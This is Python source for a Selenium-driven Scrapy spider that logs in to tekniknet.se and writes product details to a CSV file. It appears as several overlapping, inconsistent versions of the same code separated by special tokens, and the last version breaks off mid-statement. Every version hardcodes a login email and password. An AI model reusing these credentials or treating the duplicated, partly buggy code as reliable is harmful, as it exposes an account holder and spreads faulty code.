for wrapper2_2 in self.driver.find_elements_by_class_name(
'listProduct'):
wrapper2_3 = wrapper2_2.find_element_by_xpath(
'.//a')
link2_2 = wrapper2_3.get_attribute('href')
list4.append(link2_2)
list4_categories.append(csv_categories2)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link2_2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
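        # Pass 3: open every sub-category page, record its breadcrumb trail, and
        # collect the product links it lists.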
for j in range(0, len(list2)):
try:
self.loggger.info('**********-------------- ' + str(j) +
' ******************************')
self.driver.get(list2[j])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')
categories1 = breadcrumbs1.find_elements_by_xpath('.//li')
csv_categories1 = ''
for category1 in categories1:
csv_categories1 = csv_categories1 + category1.text + '/'
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'listProduct'))
)
for wrapper3 in self.driver.find_elements_by_class_name(
'listProduct'):
child_wrapper3 = wrapper3.find_element_by_xpath('.//a')
link3 = child_wrapper3.get_attribute('href')
list3.append(link3)
list3_categories.append(csv_categories1)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link3)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
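        # Pass 4: scrape every product page not seen in a previous run and
        # append one CSV row per product.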
for k in range(0, len(list3)):
try:
if list3[k] not in old_product_url:
self.loggger.info('----------------------- ' + str
(k) + ' ******************************')
self.driver.get(list3[k])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading3 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock3 non-exist')
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price3 non-exist')
csv_price_old = ''
csv_price_new = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description3 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number3 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image3 non-exist')
                    if csv_image_url:
                        # One write covers every image count: keep at most 18
                        # image URLs and pad with blanks to a fixed 19 image
                        # columns, so every CSV row has the same width; products
                        # with no image URL write no row.
                        row_images = (csv_image_url[:18] + [' '] * 19)[:19]
                        file.write('NEW' + ',' + csv_article_number + ',' +
                            list3_categories[k].split('/')[1] + ',' +
                            list3_categories[k].split('/')[2] + ',' +
                            list3_categories[k].split('/')[3] + ',' +
                            csv_heading + ',' + csv_desc + ',' +
                            csv_price_new + ',' + csv_price_old + ',' +
                            ','.join(row_images) + ',' +
                            csv_stock + ',' + list3[k] + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error3')
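        # The same scrape for products that were collected directly from
        # category pages (list4).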
for m in range(0, len(list4)):
try:
if list4[m] not in old_product_url:
self.loggger.info('********************** ' + str(
k) + ' ******************************')
self.driver.get(list4[m])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading4 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock4 non-exist')
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price4 non-exist')
csv_price_new = ''
csv_price_old = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description4 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number4 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image4 non-exist')
                    if csv_image_url:
                        # Same fixed-width row as for list3: at most 18 image
                        # URLs, padded with blanks to 19 image columns; products
                        # with no image URL write no row.
                        row_images = (csv_image_url[:18] + [' '] * 19)[:19]
                        file.write('NEW' + ',' + csv_article_number + ',' +
                            list4_categories[m].split('/')[1] + ',' +
                            list4_categories[m].split('/')[2] + ',' +
                            list4_categories[m].split('/')[3] + ',' +
                            csv_heading + ',' + csv_desc + ',' +
                            csv_price_new + ',' + csv_price_old + ',' +
                            ','.join(row_images) + ',' +
                            csv_stock + ',' + list4[m] + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error4')
file.close()
self.driver.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
output_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')
log_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)
class ProductSpider(scrapy.Spider):
name = 'tekniknet_new'
allowed_domains = ['www.tekniknet.se']
start_urls = ['https://www.tekniknet.se/#']
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('--start-maximized')
self.driver = webdriver.Chrome(chrome_options=options)
def parse(self, response):
fh = logging.FileHandler(log_output_file)
fh.setLevel(logging.INFO)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).addHandler(fh)
logging.getLogger('urllib3.connectionpool').addHandler(fh)
logging.getLogger().addHandler(fh)
self.loggger = logging.getLogger()
self.driver.get(response.url)
list1 = []
list2 = []
list3 = []
list4 = []
list5 = []
list3_categories = []
list4_categories = []
csv_categories1 = ''
csv_heading = ''
csv_stock = ''
csv_price_new = ''
csv_price_old = ''
csv_desc = ''
csv_article_number = ''
csv_image_url = []
old_product_url = []
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located
((By.ID, 'email')))
username = self.driver.find_element_by_id('email')
username.send_keys('info@themobilestore.se')
        password = self.driver.find_element_by_id('password')
        password.send_keys('order88')
login = self.driver.find_element_by_class_name('button-confirm')
login.click()
time.sleep(5)
        tmp_fd, abs_path = mkstemp()
        with fdopen(tmp_fd, 'w') as new_file:
with open('tekniknet.csv') as old_file:
for line in old_file:
new_file.write(line.replace('NEW', 'old'))
remove('tekniknet.csv')
move(abs_path, 'tekniknet.csv')
with open('tekniknet.csv', 'r') as ins:
for line in ins:
                # strip the trailing newline so stored URLs compare equal to
                # the freshly scraped ones
                old_product_url.append(line.split(',')[-1].strip())
file = open('tekniknet.csv', 'a', errors='replace')
for wrapper1 in self.driver.find_elements_by_class_name('level-0'):
child_wrapper1 = wrapper1.find_element_by_xpath('./a')
link1 = child_wrapper1.get_attribute('href')
list1.append(link1)
self.loggger.info(
'*************************************************')
self.loggger.info(link1)
for i in range(0, len(list1) - 4):
self.driver.get(list1[i])
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'inner')))
for wrapper2 in self.driver.find_elements_by_class_name('inner'
):
try:
sub2 = wrapper2.find_element_by_class_name('subLinks')
child_wrapper2 = sub2.find_elements_by_xpath('.//a')
for child2 in child_wrapper2:
link2 = child2.get_attribute('href')
list2.append(link2)
self.loggger.info(
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'
)
self.loggger.info(link2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
except:
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1 = subcategory.find_elements_by_xpath('.//a')
for child3 in wrapper2_1:
link2_1 = child3.get_attribute('href')
list5.append(link2_1)
for n in range(0, len(list5)):
self.driver.get(list5[n])
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1_1 = subcategory.find_elements_by_xpath(
'.//a')
for child3_1 in wrapper2_1_1:
if child3_1.text != 'Visa alla':
link2_1_1 = child3_1.get_attribute('href')
list2.append(link2_1_1)
except:
try:
breadcrumbs2 = self.driver.find_element_by_id(
'breadcrumbs')
categories2 = breadcrumbs2.find_elements_by_xpath(
'.//li')
csv_categories2 = ''
for category2 in categories2:
csv_categories2 = (csv_categories2 + category2.
text + '/')
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME,
'listProduct')))
for wrapper2_2 in self.driver.find_elements_by_class_name(
'listProduct'):
wrapper2_3 = wrapper2_2.find_element_by_xpath(
'.//a')
link2_2 = wrapper2_3.get_attribute('href')
list4.append(link2_2)
list4_categories.append(csv_categories2)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link2_2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for j in range(0, len(list2)):
try:
self.loggger.info('**********-------------- ' + str(j) +
' ******************************')
self.driver.get(list2[j])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')
categories1 = breadcrumbs1.find_elements_by_xpath('.//li')
csv_categories1 = ''
for category1 in categories1:
csv_categories1 = csv_categories1 + category1.text + '/'
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'listProduct'))
)
for wrapper3 in self.driver.find_elements_by_class_name(
'listProduct'):
child_wrapper3 = wrapper3.find_element_by_xpath('.//a')
link3 = child_wrapper3.get_attribute('href')
list3.append(link3)
list3_categories.append(csv_categories1)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link3)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for k in range(0, len(list3)):
try:
if list3[k] not in old_product_url:
self.loggger.info('----------------------- ' + str
(k) + ' ******************************')
self.driver.get(list3[k])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading3 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock3 non-exist')
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price3 non-exist')
csv_price_old = ''
csv_price_new = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description3 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number3 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image3 non-exist')
                    if csv_image_url:
                        # Build one csv row: 9 fixed columns, 18 image columns
                        # (padded with ' ' or truncated), an empty EAN column,
                        # stock and the product url.
                        row = ['NEW', csv_article_number,
                               list3_categories[k].split('/')[1],
                               list3_categories[k].split('/')[2],
                               list3_categories[k].split('/')[3],
                               csv_heading, csv_desc,
                               csv_price_new, csv_price_old]
                        row += (csv_image_url + [' '] * 18)[:18]
                        row += [' ', csv_stock, list3[k]]
                        file.write(','.join(row) + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error3')
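        # Second pass: product pages found directly on category pages that
        # listed products instead of sub-category links (list4).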
for m in range(0, len(list4)):
try:
if list4[m] not in old_product_url:
                    self.loggger.info('********************** ' + str(m) + ' ******************************')
self.driver.get(list4[m])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
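                    # Scrape each product field; missing fields fall back to
                    # an empty value (stock falls back to 'Out of stock').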
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
                        self.loggger.info('heading not found (list4)')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
                        self.loggger.info('stock not found (list4)')
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
                            self.loggger.info('price not found (list4)')
csv_price_new = ''
csv_price_old = ''
try:
desc = offer.find_element_by_id('pDesc')
                        csv_desc = desc.get_attribute('innerHTML').replace(
                            ',', '-').replace('\n', ' ').replace('\r', '').strip()
except:
                        self.loggger.info('description not found (list4)')
csv_desc = ''
try:
                        article_number = offer.find_element_by_id('pManufacturer')
                        csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')
except:
                        self.loggger.info('article number not found (list4)')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
                        self.loggger.info('images not found (list4)')
                    if csv_image_url:
                        # Build one csv row: 9 fixed columns, 18 image columns
                        # (padded with ' ' or truncated), an empty EAN column,
                        # stock and the product url.
                        row = ['NEW', csv_article_number,
                               list4_categories[m].split('/')[1],
                               list4_categories[m].split('/')[2],
                               list4_categories[m].split('/')[3],
                               csv_heading, csv_desc,
                               csv_price_new, csv_price_old]
                        row += (csv_image_url + [' '] * 18)[:18]
                        row += [' ', csv_stock, list4[m]]
                        file.write(','.join(row) + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error4')
file.close()
self.driver.close()
<|reserved_special_token_1|>
import scrapy
import time
import os.path
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from tempfile import mkstemp
from shutil import move
from os import fdopen, remove
from datetime import datetime
import logging
output_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')
log_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)
class ProductSpider(scrapy.Spider):
name = 'tekniknet_new'
allowed_domains = ['www.tekniknet.se']
start_urls = ['https://www.tekniknet.se/#']
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('--start-maximized')
self.driver = webdriver.Chrome(chrome_options=options)
def parse(self, response):
fh = logging.FileHandler(log_output_file)
fh.setLevel(logging.INFO)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).addHandler(fh)
logging.getLogger('urllib3.connectionpool').addHandler(fh)
logging.getLogger().addHandler(fh)
self.loggger = logging.getLogger()
self.driver.get(response.url)
list1 = []
list2 = []
list3 = []
list4 = []
list5 = []
list3_categories = []
list4_categories = []
csv_categories1 = ''
csv_heading = ''
csv_stock = ''
csv_price_new = ''
csv_price_old = ''
csv_desc = ''
csv_article_number = ''
csv_image_url = []
old_product_url = []
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located
((By.ID, 'email')))
username = self.driver.find_element_by_id('email')
username.send_keys('info@themobilestore.se')
username = self.driver.find_element_by_id('password')
username.send_keys('order88')
login = self.driver.find_element_by_class_name('button-confirm')
login.click()
time.sleep(5)
fh, abs_path = mkstemp()
with fdopen(fh, 'w') as new_file:
with open('tekniknet.csv') as old_file:
for line in old_file:
new_file.write(line.replace('NEW', 'old'))
remove('tekniknet.csv')
move(abs_path, 'tekniknet.csv')
with open('tekniknet.csv', 'r') as ins:
for line in ins:
old_product_url.append(line.split(',')[-1])
file = open('tekniknet.csv', 'a', errors='replace')
for wrapper1 in self.driver.find_elements_by_class_name('level-0'):
child_wrapper1 = wrapper1.find_element_by_xpath('./a')
link1 = child_wrapper1.get_attribute('href')
list1.append(link1)
self.loggger.info(
'*************************************************')
self.loggger.info(link1)
for i in range(0, len(list1) - 4):
self.driver.get(list1[i])
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'inner')))
for wrapper2 in self.driver.find_elements_by_class_name('inner'
):
try:
sub2 = wrapper2.find_element_by_class_name('subLinks')
child_wrapper2 = sub2.find_elements_by_xpath('.//a')
for child2 in child_wrapper2:
link2 = child2.get_attribute('href')
list2.append(link2)
self.loggger.info(
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'
)
self.loggger.info(link2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
except:
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1 = subcategory.find_elements_by_xpath('.//a')
for child3 in wrapper2_1:
link2_1 = child3.get_attribute('href')
list5.append(link2_1)
for n in range(0, len(list5)):
self.driver.get(list5[n])
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1_1 = subcategory.find_elements_by_xpath(
'.//a')
for child3_1 in wrapper2_1_1:
if child3_1.text != 'Visa alla':
link2_1_1 = child3_1.get_attribute('href')
list2.append(link2_1_1)
except:
try:
breadcrumbs2 = self.driver.find_element_by_id(
'breadcrumbs')
categories2 = breadcrumbs2.find_elements_by_xpath(
'.//li')
csv_categories2 = ''
for category2 in categories2:
csv_categories2 = (csv_categories2 + category2.
text + '/')
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME,
'listProduct')))
for wrapper2_2 in self.driver.find_elements_by_class_name(
'listProduct'):
wrapper2_3 = wrapper2_2.find_element_by_xpath(
'.//a')
link2_2 = wrapper2_3.get_attribute('href')
list4.append(link2_2)
list4_categories.append(csv_categories2)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link2_2)
self.loggger.info('error')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for j in range(0, len(list2)):
try:
self.loggger.info('**********-------------- ' + str(j) +
' ******************************')
self.driver.get(list2[j])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')
categories1 = breadcrumbs1.find_elements_by_xpath('.//li')
csv_categories1 = ''
for category1 in categories1:
csv_categories1 = csv_categories1 + category1.text + '/'
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'listProduct'))
)
for wrapper3 in self.driver.find_elements_by_class_name(
'listProduct'):
child_wrapper3 = wrapper3.find_element_by_xpath('.//a')
link3 = child_wrapper3.get_attribute('href')
list3.append(link3)
list3_categories.append(csv_categories1)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link3)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for k in range(0, len(list3)):
try:
if list3[k] not in old_product_url:
self.loggger.info('----------------------- ' + str
(k) + ' ******************************')
self.driver.get(list3[k])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading3 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock3 non-exist')
csv_stock = ''
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price3 non-exist')
csv_price_old = ''
csv_price_new = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description3 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number3 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image3 non-exist')
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
